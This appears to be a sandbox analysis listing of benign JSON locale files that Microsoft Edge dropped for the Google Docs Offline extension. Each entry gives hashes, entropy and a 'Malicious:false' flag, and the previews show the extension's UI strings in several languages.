                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1244
                                                                                                                                                                            Entropy (8bit):4.5533961615623735
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                            MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                            SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                            SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                            SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):977
                                                                                                                                                                            Entropy (8bit):4.867640976960053
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                            MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                            SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                            SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                            SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):3107
                                                                                                                                                                            Entropy (8bit):3.535189746470889
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                            MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                            SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                            SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                            SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1389
                                                                                                                                                                            Entropy (8bit):4.561317517930672
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                            MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                            SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                            SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                            SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1763
                                                                                                                                                                            Entropy (8bit):4.25392954144533
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                            MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                            SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                            SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                            SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):930
                                                                                                                                                                            Entropy (8bit):4.569672473374877
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                            MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                            SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                            SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                            SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):913
                                                                                                                                                                            Entropy (8bit):4.947221919047
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                            MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                            SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                            SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                            SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):806
                                                                                                                                                                            Entropy (8bit):4.815663786215102
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                            MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                            SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                            SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                            SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):883
                                                                                                                                                                            Entropy (8bit):4.5096240460083905
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                            MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                            SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                            SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                            SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1031
                                                                                                                                                                            Entropy (8bit):4.621865814402898
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                            MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                            SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                            SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                            SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1613
                                                                                                                                                                            Entropy (8bit):4.618182455684241
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                            MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                            SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                            SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                            SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):851
                                                                                                                                                                            Entropy (8bit):4.4858053753176526
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                            MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                            SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                            SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                            SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):851
                                                                                                                                                                            Entropy (8bit):4.4858053753176526
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                            MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                            SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                            SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                            SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):848
                                                                                                                                                                            Entropy (8bit):4.494568170878587
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                            MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                            SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                            SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                            SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1425
                                                                                                                                                                            Entropy (8bit):4.461560329690825
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                            MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                            SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                            SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                            SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):961
                                                                                                                                                                            Entropy (8bit):4.537633413451255
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                            MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                            SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                            SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                            SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):959
                                                                                                                                                                            Entropy (8bit):4.570019855018913
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                            MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                            SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                            SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                            SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                            Malicious:false
